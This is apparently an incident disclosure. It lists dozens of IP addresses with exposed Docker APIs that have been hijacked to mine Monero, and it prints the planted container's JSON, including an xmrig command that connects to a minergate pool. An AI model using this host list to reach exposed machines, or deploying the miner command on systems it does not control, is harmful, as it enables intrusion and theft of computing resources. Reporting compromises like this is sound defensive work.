All the following IPs have the docker API exposed and have been hijacked to mine XMR
101.132.125.134
101.251.243.178
101.255.124.125
101.89.134.211
110.87.27.14
114.116.95.37
117.68.155.0
118.24.67.166
119.123.179.148
119.28.84.69
119.29.25.238
120.55.60.63
120.78.161.231
122.112.211.221
122.130.156.202
122.130.162.88
130.61.37.213
13.126.251.47
13.127.225.86
132.232.136.141
132.232.89.207
138.197.178.7
142.44.136.43
142.93.58.171
159.89.214.243
18.191.227.117
18.216.162.54
18.219.135.89
182.61.18.126
193.112.82.34
198.181.44.229
206.189.172.84
34.219.234.223
34.241.123.235
34.241.26.75
34.243.229.106
35.196.240.112
36.111.35.106
37.123.179.67
40.113.227.30
40.85.221.142
45.115.236.2
45.79.90.143
46.238.43.38
49.4.88.169
52.221.217.38
52.221.254.168
52.55.245.50
52.66.50.254
52.76.241.217
52.83.226.113
52.83.231.122
52.83.255.247
52.87.113.76
54.145.128.254
54.175.91.189
54.183.234.49
54.191.252.227
54.200.143.122
54.202.26.218
54.223.241.195
54.66.165.97
66.226.76.221
68.168.131.140
81.226.150.217
All appear to have a the following image and command line.
{
"Status": "Up 20 hours",
"Created": 1536506330,
"Image": "tmpdocker/xmr",
"Labels": {},
"NetworkSettings": {
"Networks": {
"bridge": {
"NetworkID": "REDACTED",
"MacAddress": "REDACTED",
"GlobalIPv6PrefixLen": 0,
"Links": null,
"GlobalIPv6Address": "",
"IPv6Gateway": "",
"DriverOpts": null,
"IPAMConfig": null,
"EndpointID": "REDACTED",
"IPPrefixLen": 16,
"IPAddress": "172.17.0.3",
"Gateway": "172.17.0.1",
"Aliases": null
}
}
},
"HostConfig": {
"NetworkMode": "default"
},
"ImageID": "sha256:96f015c729696b0fe40d4c12710990be310543c51a77f7e4150edc0a6bd3158e",
"State": "running",
"Command": "./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x --safe -k",
"Names": [
"/clever_lovelace"
],
"Mounts": [],
"Id": "c0c4149d65341041d8c4b6577b24669e4bf74dcb0e327d12157ad5564ee2e792",
"Ports": []
},
All appear to have the same protonmail email address used for the miner pool
[email protected] connecting to stratum+tcp://xmr.pool.minergate.com:45700